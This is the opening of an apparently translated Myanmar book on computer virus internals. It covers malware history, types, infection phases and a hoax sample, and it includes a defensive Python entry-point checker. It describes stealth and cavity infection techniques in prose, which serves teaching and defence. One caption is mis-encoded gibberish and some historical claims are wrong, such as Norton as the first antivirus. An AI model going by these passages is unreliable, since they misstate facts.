The Virus Internals


The Viruses : Internals V 1.0 - rhythm (Myanmar Cracking Team)


 
The Viruses : Internals V 1.0
Table of Contents
(item number, subject, page from and to)

1. Preface, pp. 4-5

Chapter (1)
History of computer viruses, pp. 6-10

Chapter (2)
Virus types and characteristics, pp. 11-25
3. Malware types, pp. 11-12
4. What a virus is, pp. 12-13
5. How virus code works in the infection phase, pp. 13-15
6. How virus code works in the attack phase, p. 15
7. Why computer viruses are created, p. 16
8. Similarities in virus-like attacks, p. 16
9. Virus hoaxes, p. 17
10. Symptoms of a virus attack, pp. 17-18
11. Classifying virus types, pp. 18-23
12. Self-modifying viruses, pp. 23-25

Chapter (3)
How a computer works, pp. 26-38
13. Windows XP/2000/NT Startup Process, pp. 26-28
14. Windows NT Kernel, pp. 28-29
15. Windows Logon Process (Winlogon), pp. 29-31
16. Windows Vista Startup Process, p. 31
17. File types to be wary of, pp. 31-35
18. Windows Registry, p. 36
19. Running programs at Windows startup, pp. 36-37
20. Blocking use of Registry Editor and Task Manager, p. 37
21. Hiding Folder Options from Control Panel, pp. 37-38
22. Preventing booting into Safe Mode, p. 38

Chapter (4)
Famous viruses, pp. 39-52
23. Introduction, p. 39
24. Technical impacts, p. 39
25. Ethical and copyright impacts, p. 39
26. Psychological impacts, p. 40
27. Stoned virus, pp. 40-43
28. Jerusalem virus, p. 43
29. Morris Worm, pp. 43-47
30. The Concept virus, pp. 47-48
31. Melissa Worm, pp. 48-49
32. Loveletter Worm, pp. 49-50
33. The Anna Kournikova virus, pp. 50-51
34. CodeRed, pp. 51-52

Chapter (5)
Locally made viruses, pp. 53-65
35. Introduction, p. 53
36. Magway FC virus, pp. 53-62
37. Thayet Myo Hacking Day virus, pp. 62-63
38. Loikaw virus, p. 63
39. Happy Birthday virus, pp. 63-64
40. One Missed Call virus, p. 64
41. Kolay virus, pp. 64-65

Chapter (6)
Defending against the virus threat, p. 66
42. Stages of a virus, p. 66
43. Creating simple viruses, pp. 66-67
44. Virus creation kits, pp. 67-68
45. Methods of detecting viruses, p. 68
46. Scanning, pp. 68-69
47. Checking file integrity, p. 69
48. Using interceptors, p. 69
49. Analysing viruses, pp. 70-71
50. Protecting against viruses, pp. 71-72

52. References, p. 73
Preface
1. In the present era technology is advancing at high speed, and among all fields computer technology is developing fastest. After Microsoft released Windows XP and Intel began producing and selling processors at affordable prices, the use of desktop and laptop computers grew remarkably. Advances in computer technology have brought benefits such as saving time, saving manpower and reducing costs, but we have also come to face incidents in which computer technology is misused and wrongdoing is committed by exploiting the weaknesses of computer systems.
2. Within the development of computer technology, software development has become an important field, and software is written in different programming languages for different operating systems. Just as a great many useful programs have appeared, on the other side computer viruses that disrupt the operating system have also appeared.
3. Whether they have only a weak grounding in computing or are skilled experts, everyone has unavoidably encountered, to a greater or lesser degree, the danger of computer viruses. Computer viruses have caused a great deal of damage and loss, as well as ill effects such as frustration and wasted time. A clear example is the Stuxnet virus, which in 2010 targeted Iran's nuclear plants and delayed Iran's nuclear programme. Today computer viruses no longer merely damage the operating system but also carry out actions such as stealing information, so that they can even affect national security. To protect against the danger of computer viruses, anti-virus software was therefore written and efforts were made to defend against the virus threat.
4. Today computer users wrongly assume that using anti-virus software protects them completely from viruses. However great the strengths of the best anti-virus software, it does not recognise or remove the newest viruses; anti-virus programs can only recognise viruses that have appeared and attacked before. Nowadays, as young people take an interest in programming, we also see them writing viruses to try their hand, and not every anti-virus program can detect those viruses. Complete protection against the virus threat is therefore only possible once one has thorough knowledge of viruses oneself.
5. Merely knowing about the destructive danger of viruses and the related information gives only moderate protection against them. Only those who have studied the software discipline of reverse engineering and are proficient in programming can defend against viruses almost completely. It is therefore necessary to develop human resources who are proficient in reverse engineering.
6. This book began as a paper intended for submission in a training course. Because of the time limit on gathering the sources a paper needs, I must admit that this book cannot provide complete and sufficient information. Originally there was no plan to publish it; I wanted to publish only after adding further material. However, since I also wanted to get it into readers' hands quickly, it is being distributed now. I therefore ask for understanding and forgiveness for any omissions, weaknesses or errors.
7. Ever since reading the free books on viruses distributed online and the printed books, some points have not sat well with me. Mistaken analyses and assumptions about viruses, and the failure to describe viruses completely, gave rise to the wish to write a book about viruses. One can accept that a book or paper is not complete in its subject matter, but misjudging the nature and workings of viruses without properly understanding them endangers the reader. Another point I want to raise is the use of exaggeration and bluster in writing in order to impress the reader. Reading may be done to learn about a subject one does not know, or to find out how others think about a subject one already knows, and there may well be many readers who know more than the author. I consider the main purpose of writing a book to be enabling readers to understand the subject one wishes to present, rather than showing off. The code relating to viruses is presented as completely as possible. What I want to tell readers is that I would rather they give priority to studying how that code works than copy and use it as it is.
8. There are people to thank for this book. To write about locally made viruses, I had no local viruses myself, so I made a request online for local viruses to be sent to me. Thit Pin, a younger friend from online, sent me viruses that had spread locally and the locally written Magway FC virus; I want to thank Thit Pin first of all. Others who deserve thanks are my friend WML, who gave the impetus for this book, and ZMA, who drew the book's cover.
9. At the time of writing I had only the Magway FC virus, so I could analyse only that one virus in detail. Likewise, because of time constraints I was not able to study the other viruses that spread locally. I would like to inform readers that the polymorphic and metamorphic viruses I wish to write about will be included in future versions.
rhythm (Myanmar Cracking Team)
(4-12-2013)
Chapter (1)
History of computer viruses
1. Looking back at the origin of computer viruses, it began in 1949 when the mathematician John Von Neumann described self-replicating programs similar in concept to today's computer viruses. However, no viruses older than the present ones were found in the years before 1960. In the following decade a group of programmers created a game called Core Wars. Every time it ran, programs in that game multiplied, even to the point of filling another player's computer memory. The creators of that game themselves wrote the Reaper program, which can be called the first anti-virus, and it destroyed the copies made by Core Wars. In any case, in 1983 one of those programmers revealed in a famous science magazine that Core Wars had existed. This was the beginning of what we today call computer viruses. In that same year Fred Cohen, in his thesis, defined a computer virus as "a computer program that modifies other computer programs so that they replicate on its behalf".
2. At that time MS-DOS (Microsoft Disk Operating System) was about to become the unrivalled operating system across the world. Although that system created good prospects for software development, it had hardware-related shortcomings. Despite such shortcomings, MS-DOS became the target of a virus in 1986. That virus was the Brain virus, created by two Pakistanis, Basit and Amjad; it infected the boot sectors of floppy disks and made the data on the disk unreadable. The name "© Brain" was found on infected floppy disks. In the same year the first Trojan, the PC-Write application, was born.
3. Before long, virus writers realised that infecting files could cause operating systems even more trouble. In 1987 the first file-infecting virus, Suriv-02, appeared; it infected .com files and opened the way for the notorious Jerusalem virus, also called Viernes 13. The Jerusalem virus activated on every Friday the 13th, infected .exe and .com files, and destroyed every program run on that day; it was able to destroy tens of thousands of users' programs. In 1988 the Morris Worm appeared and affected 6,000 computers, 10% of all computers connected to the nascent Internet. Its creator, Cornell University graduate student Robert Tappan Morris, became the first person prosecuted under the Computer Fraud and Abuse Act.
4. In 1990 Symantec released Norton Anti-virus, the first anti-virus program. In 1991 the first polymorphic virus, Tequila, spread. Because polymorphic viruses change their form with every new infection, they are hard for virus scanners to detect. In 1992 the number of viruses reached 1,300, a 420% increase over the viruses that existed in December 1990. In those years the Dark Avenger Mutation Engine (DAME) was created; that toolkit turned ordinary viruses into polymorphic viruses. Likewise the Virus Creation Laboratory program appeared and became the first toolkit that produced real, genuine viruses.
5. In 1994 the Good Times e-mail hoax spread through the computer community. The hoax warned that "if you open an e-mail whose subject line contains the words Good Times, it will destroy all the data on your hard drive". Though untrue, the hoax resurfaced every six to twelve months. Around 1995 Word Concept became the most widespread virus, spreading through Microsoft Word files; because users shared their documents by e-mail, the virus spread quickly. In 1996 the Baza, Laroux (a macro virus) and Staog viruses became the first viruses to infect Windows 95 files, Excel and Linux respectively.
6. The StrangeBrew virus, which appeared in 1998, infected Java class files. Likewise the Chernobyl virus spread rapidly through .exe files; Chernobyl not only attacked files but even attacked the Flash BIOS of infected computers. Two teenagers from the state of California broke into and took control of more than 500 military, government and private computer systems.
7. The Melissa virus, which appeared in 1999, ran a macro inside a document attached to an e-mail and sent the infected document to 50 people from the user's Outlook address book. It also infected other Word documents, and if those files were sent as attachments they infected other people's Word documents too. Melissa spread faster than any previous virus and infected about a million computers. Because of the enormous Internet traffic, Intel's and Microsoft's mail servers had to be shut down temporarily. Bubble Boy was the first worm that could infect merely by the e-mail being opened, without the recipient opening an attachment. Tristate was the first multi-type macro virus, infecting Word, Excel and PowerPoint files.
8. In 2000 the Loveletter Worm, known as the Love Bug, spread through Outlook like Melissa. Loveletter was a .vbs file; it deleted files such as .mp2, .mp3 and .jpg and sent user names and passwords to the virus writer. Loveletter can be considered the most destructive of the viruses released so far; within nine days it infected more than 50 million computers. W97M.Resume.A was a new variant of the Melissa Worm, using a Word macro to spread through Outlook. The Stages virus spread across the Internet disguised as a joke e-mail about the stages of life; it hid in the attachment behind a fake .txt extension and enticed recipients into opening it.
9. The Nimda Worm, which appeared after the 9/11 attacks, infected hundreds of thousands of computers and was one of the most complex viruses, with five different methods of replicating and infecting systems. The Anna Kournikova virus alarmed malware analysts who had believed that "viruses easily created with a toolkit by inexperienced programmers cannot be dangerous". It enticed e-mail recipients into opening what was presented as an attached photo of the attractive, glamorous tennis player Anna Kournikova. The virus was created by a young Dutch programmer obsessed with Anna Kournikova, and there was no photo at all behind the message. Likewise, worm outbreaks grew with Sircam, CodeRed and BadTrans, which caused the most trouble. The CodeRed Worm attacked vulnerable web pages and infected 359,000 hosts in its first 12 hours. BadTrans was written to intercept and steal passwords and credit card details.
10. In 2002 the author of the Melissa virus was sentenced to twenty months in prison. The LFM-926 virus appeared, displaying the message "Loading.Flash.Movie" and infecting Shockwave Flash (.swf) files. Viruses named after the famous singers Shakira, Britney Spears and Jennifer Lopez appeared. The Klez worm spread between e-mails, hiding original files and making copies of itself, disabling anti-virus programs and replacing files with 00 bytes. The Bugbear Worm was a complex worm that infected by many different methods.
11. The Slammer (Sapphire) Worm, which appeared in 2003, was the fastest spreading, infecting 75,000 computers within ten minutes; from the first minute of infection the number of infections doubled every 8.5 seconds. The Sobig Worm was the first worm to connect with spam organisations. Infected computer systems became spam relay points, and spamming techniques existed for sending mail in bulk to those selected for attack.
12. In January 2004 the MyDoom Worm, or Novarg, spread through e-mail and file-sharing software, faster than any previous virus or worm. MyDoom lured e-mail recipients into opening the attachment and gave hackers access to the infected computer's hard drive. Its goal was a denial of service (DoS) attack on the SCO company. SCO was a company suing groups that used an open-source version of its UNIX program language. SCO offered a reward of 250,000 dollars to anyone who gave information leading to the arrest and conviction of the worm's author. In May about a million Windows computers were hit by the Sasser Worm. Victims included a British airline, banks and government offices including the British coastguard. Although the worm did no irreparable damage to computers or data, it slowed computers down and restarted them without reason. What distinguished Sasser from other viruses was that no file attachment had to be opened for infection; instead the worm searched for computers with security weaknesses and sabotaged them. An 18-year-old German high-school student confessed to creating the worm, and he was suspected of having written and released other versions of the virus.
13. In March 2005 the world's first cell-phone virus, Commwarrior-A, was seen. The virus probably originated in Russia and spread through text messages. According to the latest analyses Commwarrior-A infected only about 60 cell phones, but fear of ever more capable cell-phone viruses grew higher and higher.
14. The Conficker virus, discovered in November 2008, is considered the largest worm since Slammer of 2003. The worm infected between 9 million and 15 million server systems, including servers of the French navy, the UK Ministry of Defence, the Norwegian police and other government organisations. At least five variants of the virus had been released since its discovery. The authorities believed the authors of Conficker may have written and released those variants to counter attempts to eradicate the virus.
15. Stuxnet, discovered in June 2010, targeted Siemens industrial software running on Microsoft Windows. It was the first worm to destroy industrial equipment. Likewise, Stuxnet was the first worm to include programmable logic controller (PLC) software in order to hide its existence. In August the security software company Symantec reported that about 60% of Stuxnet-infected computers were in Iran. In November Siemens announced that the worm had caused no damage to its customers' computers. Nevertheless, Iran's nuclear programme was damaged by Stuxnet; Iran was using Siemens equipment, which it was barred from obtaining, for its nuclear programme. The Russian computer company Kaspersky Lab concluded that Stuxnet was a sophisticated and complex type of attack that could only be carried out with the full backing of a nation state.
16. In 2012 Flame, a kind of malware attacking Microsoft Windows computers, was discovered. A report issued on 28 May by the CrySys Lab of the University of Budapest stated that "in any case, it is the most complex malware ever encountered". Flame could record Skype conversations, audio, keyboard activity, network usage and screenshots. It spread to USB sticks or the local network. Flame contained a kill command that would erase all traces of it from the computer. On 1 June an article in The New York Times reported that Stuxnet was part of an intelligence operation by the United States and Israel called "Operation Olympic Games"; it began during George Bush's presidency and the operation continued into President Obama's term.
Chapter (2)
Virus types and characteristics
1. Before discussing virus types, and so that viruses are not confused with worms, adware, Trojans, spyware and the like, I want first to introduce malware. Malware is a piece of software written with the intention of carrying out destructive or unwanted behaviour. The term malware is used to describe unwanted software such as botnets, viruses, worms and Trojans.
Malware types
2. The types of malware are as follows:
(a) Worm. A worm is a self-replicating program that takes full advantage of a system's weaknesses and holes in order to infect other computer systems.
(b) Virus. This type of malware spreads when an executable file (usually an .exe file) is run or started. The spread of viruses therefore depends on the user.
(c) Trojan. A Trojan is a program that pretends to be a legitimate program. It infects the computer system from behind the scenes and enables the intruder to gain access to the system.
(d) Botnet. A private network of computers that, without their owners' knowledge, are infected with malware and under the control of a group.
(e) Spyware. The term spyware can refer to Trojans, keyloggers and backdoors. Basically it is a program written to steal private personal information. The information may leak out as files, as keystroke logs or through screenshots.
(f) Keylogger. A computer program that records every keystroke made by the user, intended particularly to obtain passwords and other confidential information by deceit.
(g) Dialer. A program often used to redirect Internet connections. When used maliciously, it cuts the legitimate telephone connection used for the Internet and reconnects through premium-rate numbers (1-900 numbers). A dialer is a kind of spyware and can make use of your dial-up settings.
3. An important point is that a single piece of malware may combine spyware, worms, or other components such as keyloggers and Trojans. More malware categories can therefore be added if desired. The Zeus/Zbot malware serves as an example: Zeus can be placed in any of the following groups.
(a) Trojan. It hides silently on the victim's computer and tries to start automatically with the system.
(b) Botnet. It can be centrally managed from a single server that handles thousands of victims. Zeus also includes plugins capable of DDoS attacks.
(c) Spyware. Zeus is basically spyware and tracks the activities of its victims.
(d) Keylogger. Zeus records the keys pressed on the keyboard, but this is rarely used; instead it uses more interesting methods to record information.
What a virus is
4. A computer virus is a self-replicating program that produces its own code and adds that code to the code of another .exe file. Computer viruses can be regarded as a threat to personal and business operations alike. They run without the computer user's consent. Viruses reside in memory while the infected program runs and carry out their replication; when the program finishes running they can no longer remain in memory. They search for other files in the system and try to infect them. Viruses are characterised by their destructive intent, although some viruses are written with no particular purpose other than to replicate. Computer viruses closely resemble biological viruses: both kinds need hosts to survive and spread. Computer viruses must infect .exe files to spread, while biological viruses infect the host's cells.
5. Worms are a kind of self-replicating malware. Like viruses they have the property of spreading, and sometimes worms are classed as viruses. The main differences between viruses and worms are:
(a) Viruses need host files in order to spread, whereas worms are standalone programs and need no host files to spread.
(b) Worms can spread without any action by the computer user.
6. Viruses can transform themselves by changing their code. In addition, viruses can hide from detection by the following three methods:
(a) Hiding themselves by encryption.
(b) Altering disk directory data in order to substitute additional virus bytes.
(c) Using stealth algorithms to redirect disk data.
7. Viruses can attack the target computer system in many ways. They can attach themselves to programs, create specific events, and pass the infection on to other programs. Because viruses cannot start by themselves, cannot infect hardware, and cannot be transmitted through non-executable files, those events must occur. When the computer user opens attachments from e-mail, websites, flash cards and so on, the "triggering" and "direct attack" processes bring the virus to life and infect the target computer. The virus can then attack the programs that come with the computer system, anti-virus software and data files, and the computer's startup system. Generally a virus may have two phases, which are as follows:
(a) Infection phase
(1) Virus creators decide when the programs of the target computer system are to be infected.
(2) Some viruses infect every time they run (for example, direct-action viruses).
(3) Some virus code runs at the time, on the day, or at the special event it chooses for infection (for example, TSR viruses first load into memory and infect only at later stages).
(b) Attack phase
(1) Some viruses have trigger events that activate them to damage the system.
(2) Some viruses duplicate files and then delete them, or increase session time.
How virus code works in the infection phase
8. A virus can infect a computer system using the following sequence:
(a) The virus loads itself into memory and checks the executable files on the disk.
(b) The virus adds its malicious code to legitimate programs without the user's knowledge or permission.
(c) The user is unaware that files have been replaced and that infected programs are running.
(d) Other programs also become infected in turn as a consequence of the infected programs running.
(e) The cycle above keeps running as long as the computer user does not yet suspect that the system is no longer behaving normally.
9. Viruses must carry out triggering and execution. While a computer is running there are many ways for programs to be executed. For example, any setup program calls quite a number of programs that come built into the system, and some of these are intermediary programs for deployment. If a virus program is present, it can come alive during those operations and will thoroughly infect further setup programs. Particular viruses infect by different methods. A file virus infects by attaching itself to a program. Plain-text files such as original program source code, batch files and script files can also be regarded as potential targets for virus infection. A boot sector virus runs its code, located in the first location of the disk, before the target computer starts up.

yHk(1) .exe zdkifwpfckudk Adkif;&yfpful;pufjcif; rjy


jyKrDESifh ul;pu
ufxm;NyD;aemmuf jrif&yHk
10. Viruses spread in many ways. There are viruses that infect and spread every time they run. Some do not infect when they are first run: they hide in the computer's memory and infect programs only later. Such viruses wait for predetermined trigger events in order to spread at a later stage, which makes it hard to determine which event will trigger a dormant virus's infection.
Figure (1) shows how virus code works in the infection phase. Looking at Figure (1-b), it can be seen that, before the virus infects with its code, it goes and modifies the Instruction Pointer (IP) value in the file header of the .exe file. That Instruction Pointer then points to where the virus code is, so the virus code is executed first and only afterwards is the original program code run.
11. The following are the most likely ways for a virus to spread:
(a) Infected files. A virus can infect many kinds of files.
(b) File distribution operations. Viruses can spread infected files through file servers. When a user opens such a file without suspicion, it infects their machine.
(c) Floppies and other storage media. When an infected disk is inserted into a virus-free computer, that computer system is infected as well.
How virus code works in the attack phase
12. Viruses do not merely replicate, as their creators intend; they also damage their targets. Some viruses delete files, alter the data inside data files, slow down the operating system and perform operations that have nothing to do with the applications. Figure (2).
Figure (2) Page blocks on disk or in memory that, after a virus attack, are no longer contiguous but scattered in separate places
Why computer viruses are created
13. Examining why people write and distribute computer viruses reveals the following reasons:
(a) To carry out research projects.
(b) As a prank.
(c) Vandalism.
(d) To attack the products of targeted companies.
(e) To spread political messages.
(f) Financial gain.
(g) To steal identity cards.
(h) Espionage.
(i) Covert extortion.
Problems that resemble virus attacks
14. Sometimes, whether through users' limited knowledge or through anxiety, people assume that the following problems are caused by a virus attack when in fact they are not:
(a) Hardware-related problems.
(b) The computer beeping without showing anything on the screen.
(c) One of two installed anti-virus programs reporting that the system contains a virus.
(d) The hard drive's name changing.
(e) The computer frequently running into errors and halting.
(f) The computer slowing down when programs start.
(g) The operating system no longer being usable.
(h) Files and folders suddenly disappearing, or their attributes changing.
(i) Frequent hard drive activity (the computer's activity light flashing rapidly).
(j) Internet Explorer hanging.
(k) Friends saying they have received messages you never sent.
Virus hoaxes
15. Hoaxes are false reports about viruses that do not exist. The warning messages that circulate saying that opening a certain e-mail will destroy the whole computer system are also hoaxes. In some cases they themselves carry viruses. Hoaxes can do serious damage on the systems they target. Viruses give rise to myths easily, mainly through misunderstanding. Some hoaxes, although posted deliberately, ended quickly because of their implausible content. Figure (3) presents a sample hoax.
Subject: [Fwd: Beware of the Budweiser virus--really!]
This information came from Microsoft yesterday morning. Please pass it on to anyone you know
who has access to the Internet. You may receive an apparently harmless Budweiser Screensaver. If
you do, DO NOT OPEN IT UNDER ANY CIRCUMSTANCES, but delete it immediately. Once
opened, you will lose EVERYTHING on your PC. Your hard disk will be completely destroyed and
the person who sent you the message will have access to your name and password via the Internet.
As far as we know, the virus was circulated yesterday morning. It’s a new virus, and extremely
dangerous. Please copy this information and e-mail it to everyone in your address book. We need to
do all we can to block this virus. AOL has confirmed how dangerous it is, and there is no Antivirus
program as yet which is capable of destroying it.
Please take all the necessary precautions, and pass this information on to your friends,
acquaintances and work colleagues.
End of message.
EMAILCHIEF
Figure (3) The Budweiser virus hoax
16. Budweiser, also called Buddylst.zip, is in fact not a virus but merely a hoax. If a recipient who believes it to be a virus anxiously forwards the e-mail to around a hundred friends, and they in turn pass it on to their own friends, within hours the e-mail will have spread to tens of thousands of people. The disk space consumed, the extra network usage, the friends' wasted time and the disruption of work then cause losses running to thousands of dollars. The e-mail shown in Figure (3) is nothing but a rumour, and on reading it many implausibilities can be spotted.
Symptoms of a virus attack
17. The following are symptoms that indicate a computer has been infected by a virus:
(a) Programs taking a long time to open.
(b) The hard drive always being full even though the user has not installed any program.
(c) The floppy disk and hard disk drives working while not in use.
(d) Unknown files appearing on the computer.
(e) Strange sounds coming from the keyboard or the computer.
(f) Strange things being displayed on the screen.
(g) File names being strange, or file names that are impossible to remember.
(h) The hard drive being unreadable when attempting to boot from the floppy drive.
(i) Program sizes changing.
(j) Memory appearing to be in use, and the computer system slowing down.
Classification of virus types
18. Viruses can be classified either by what they infect or by how they infect. By the part of the computer system that the virus infects, the following types can be defined:
(a) Boot/system-sector viruses. The virus's targets are the Master Boot Record and the DOS Boot Record system sectors, which are read and executed when the computer starts. Every disk has a system sector. If a bootable CD-ROM is infected, it can become a source of infection. Because the DOS boot sector is executed at startup, it is a weak point for virus attack. Damaging the boot sector can make the disk unreadable; this sector can be rewritten with the SYS or FORMAT /S command. Even floppy disks that cannot be booted from can carry viruses in their boot sector. If an infected floppy is left in the computer, every attempt to boot from the floppy will infect the computer system. System sector viruses affect the disk's executable code, while boot sector viruses affect the disk's boot sectors. Every disk has sectors in which programs can be stored. The system sector contains only 512 bytes of disk space, which is why system sector viruses hide their code in other free areas of the disk. The main carrier of system sector viruses is the floppy disk. These viruses are usually memory-resident. Some sector viruses also spread from infected files; they are called multipartite viruses. Figure (4) shows how the Master Boot Record is moved to another sector after a boot sector virus infection.
Figure (4) The disk as it appears before and after infection by the Stoned virus
(b) Program viruses. These viruses generally infect executable program files with extensions such as .bin, .com, .exe, .dll (Dynamic Link Library), .ovl (Overlay), .drv (Driver) and .sys (Device Driver). Cascade, for example, is a program virus.
(c) Multipartite viruses. These viruses infect program files and also infect boot sectors. Invader, Flip and Tequila are multipartite viruses.
(d) Network viruses. Network viruses can replicate using the commands and protocols of a computer network. They spread through e-mail. These viruses transfer their code to a remote server and can execute their code through remote computers. Network viruses create temporary files on the disk.
(e) Source code viruses. These make it appear that the source code on the computer system has been infected with Trojan code. Because there are so many compilers and programming languages today, source code also exists in many forms, so a source code virus cannot have a fixed form. Secondly, only a few people can write such viruses, because suitable victims are hard to find and hard to infect.
#include <stdio.h>

/* Stub representing the inserted virus routine; the figure only shows its comment. */
void infect(void)
{
    /* virus code to search for *.c files to infect */
}

int main(void)
{
    infect(); /* Do not remove this function!! */
    printf("Hello World!\n");
    return 0;
}
Figure (5) A .C source file of the C programming language infected by a virus
(f) File viruses. A file virus infects only executable files, because it inserts its code into the original file and has that file execute it. Although there are very many file viruses, no two are alike. They infect in various ways and can be found in a good many file types. The commonly seen file viruses work by checking for easily infected file types, such as files whose names end in .com or .exe. While the program runs, the virus also has to run and infect files. Rewriting a virus is not easy, because the rewritten programs no longer perform any correct operation. Such viruses need to be identifiable at once. Before inserting their code into a program, some file viruses save the original instruction code and afterwards let the original program run; only then does the program appear to be in its original state. Like system sector viruses, file viruses use stealth techniques to become memory-resident and conceal their presence. If the files under a directory are listed, no growth in file size is visible. If the user tries to read the file, the virus intercepts the request and hands the original file back to the user. Because there are so many infection methods, file viruses can infect a great many file types.
(g) Macro viruses. Macro viruses run automatically, following their built-in sequence, when a particular file is opened. Macro viruses are somewhat less dangerous than the other types. Macro viruses spread through e-mail. Files containing nothing but data cannot spread viruses; sometimes, however, the boundary between a data file and a program file can easily be crossed by ordinary users by means of the macro languages used in certain programs. Virus writers can attack the weaknesses of Microsoft products with macro functionality, namely Word, Excel and the other Office programs. Moreover, even the Professional version of Adobe Acrobat, which can read and edit PDF files, can be attacked by inserting the latest macro code.
19. By infection method, viruses can be classified as follows:
(a) Terminate and Stay Resident (TSR) viruses. TSR viruses stay in memory permanently, whether for the whole session or after the host target program has run and been closed. Such viruses can be removed only by shutting the computer down and starting it again.
(b) Direct or transient viruses. These viruses hand all control over to the host code in which they will reside, select the target program that is to be modified, and corrupt that program.
(c) Companion viruses. A companion virus takes the same file name as the targeted program file and saves its own file under it. If that file is opened, the virus infects the computer and the data on the hard disk is modified.
(d) Polymorphic viruses. These viruses are written to confuse the anti-virus programs that scan the computer system for viruses. This kind of virus is hard to track, because its characteristics change after every infection. Virus writers even create metamorphic engines and toolkits for writing viruses.
(e) Stealth viruses. To avoid being found or recognised by anti-virus programs, these viruses hide, while running, by altering or destroying selected service call interrupts. When operations involving those service call interrupts are requested, they are replaced with virus code. To hide their presence from anti-virus programs, these viruses present false information. For example, a stealth virus conceals the modifications it has made and, as shown in Figure (6), returns false reports. In this way it takes hold of parts of the target system and hides its virus code. Frodo, Joshi and Whale are stealth viruses. One of the carriers of stealth viruses is the rootkit. Planting a rootkit has consequences for a virus attack, because rootkits are planted through Trojans and can therefore hide any malware.
Figure (6) A stealth virus handing the uninfected file to anti-virus software
(f) Cavity viruses. Some program files contain empty areas. Because cavity viruses store their code in those empty areas, they are also known as space-filler viruses. The virus places itself in the empty space without destroying any of the original code; it places itself inside the file it infects. These viruses are rarely used, because the code is hard to write. They are also called space-fillers because placing their code inside the target program's code does not change the file size. Note, however, that although the file size does not change, the Cyclic Redundancy Check (CRC) value usually does; in programs that check their CRC, only the virus code runs and the original program no longer runs. That is why programs infected by a cavity virus fail to open. As shown in Figure (7), cavity viruses write their code at the end of the file, in the empty spaces (caves) at the end of the code section, and change the Address of Entry Point from which the file's code starts to be read. In this way the virus code is read and executed first, and only afterwards is the original program code run.
Figure (7) A cavity virus filling a program's empty (00-byte) spaces with virus code
(g) Tunneling viruses. In order to install themselves inside the BIOS and DOS, these viruses trace the steps of the interceptor programs that watch the operating system's requests. Tunneling viruses are capable of hiding from anti-virus programs.
(h) Camouflage viruses. A camouflage virus can disguise itself as a genuine application. Such viruses are not very hard to find, because anti-virus programs have advanced to the point where they can track them easily.
(i) Bootable CD-ROM viruses. These viruses are distributed on CD-ROMs and are usually stored in compressed form. If the computer is booted from an infected CD-ROM, the contents of the hard disk may be destroyed. No anti-virus program can stop this virus, because when booting from the CD-ROM neither the anti-virus software nor even the operating system is running yet.
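Added example (not from the original document) for the entry-point change described for file viruses (Figure 1-b) and for cavity viruses (Figure 7): a Python check that parses the PE headers of a Win32 executable and reports whether AddressOfEntryPoint still lies inside the used part of the first code section. The sample PE images are constructed by hand for the demo, and the section names and verdict strings are this example's own.

```python
"""Entry-point heuristic for Win32 PE files (added example, constructed data)."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000   # section Characteristics flag: contains code
SECTION_HDR = "<8sIIIIIIHHI"         # IMAGE_SECTION_HEADER, 40 bytes


def build_pe(entry_point, sections):
    """Assemble a minimal PE32 header block; test data only, not a real program."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew: PE header follows DOS header
    opt = bytearray(224)                            # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)          # Magic = PE32
    struct.pack_into("<I", opt, 16, entry_point)   # AddressOfEntryPoint (RVA)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    table = b"".join(
        struct.pack(SECTION_HDR, name, vsize, va, raw, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, raw, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


def parse_pe(data):
    """Return {'entry': RVA, 'sections': [...]} read from the PE headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]     # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]      # SizeOfOptionalHeader
    opt = coff + 20
    entry = struct.unpack_from("<I", data, opt + 16)[0]          # AddressOfEntryPoint
    sections, off = [], opt + opt_size
    for _ in range(n_sections):
        name, vsize, va, raw, _, _, _, _, _, chars = struct.unpack_from(SECTION_HDR, data, off)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va,
                         "vsize": vsize, "raw": raw,
                         "exec": bool(chars & IMAGE_SCN_MEM_EXECUTE)})
        off += struct.calcsize(SECTION_HDR)
    return {"entry": entry, "sections": sections}


def assess_entry_point(pe):
    """Classify where the entry point lands.

    'ok'               - inside the used part of the first code section
    'cave'             - in a section's slack (VirtualSize..SizeOfRawData): the
                         00-byte padding a cavity virus fills, file size unchanged
    'appended-section' - in the last section, i.e. code appended to the file
    'unexpected-section' / 'outside-image' - other redirections worth a look
    """
    entry, sections = pe["entry"], pe["sections"]
    code = [s for s in sections if s["exec"]]
    for idx, s in enumerate(sections):
        if s["va"] <= entry < s["va"] + max(s["vsize"], s["raw"]):
            if entry >= s["va"] + s["vsize"]:
                return "cave"
            if code and s is code[0]:
                return "ok"
            return "appended-section" if idx == len(sections) - 1 else "unexpected-section"
    return "outside-image"


# Constructed sample images: (name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics)
TEXT = (b".text", 0x1000, 0x800, 0x1000, 0x60000020)   # 0x800 bytes of code, 0x1000 on disk
DATA = (b".data", 0x2000, 0x200, 0x200, 0xC0000040)
EXTRA = (b".vir", 0x3000, 0x400, 0x400, 0xE0000020)    # hypothetical appended code section
CLEAN = build_pe(0x1200, [TEXT, DATA])
CAVITY = build_pe(0x1900, [TEXT, DATA])          # same sections, same size; EP moved into the cave
APPENDED = build_pe(0x3000, [TEXT, DATA, EXTRA])

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("cavity", CAVITY), ("appended", APPENDED)):
        pe = parse_pe(image)
        print(f"{label:9s} entry=0x{pe['entry']:x} size={len(image)} -> {assess_entry_point(pe)}")
```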
Self-modifying viruses
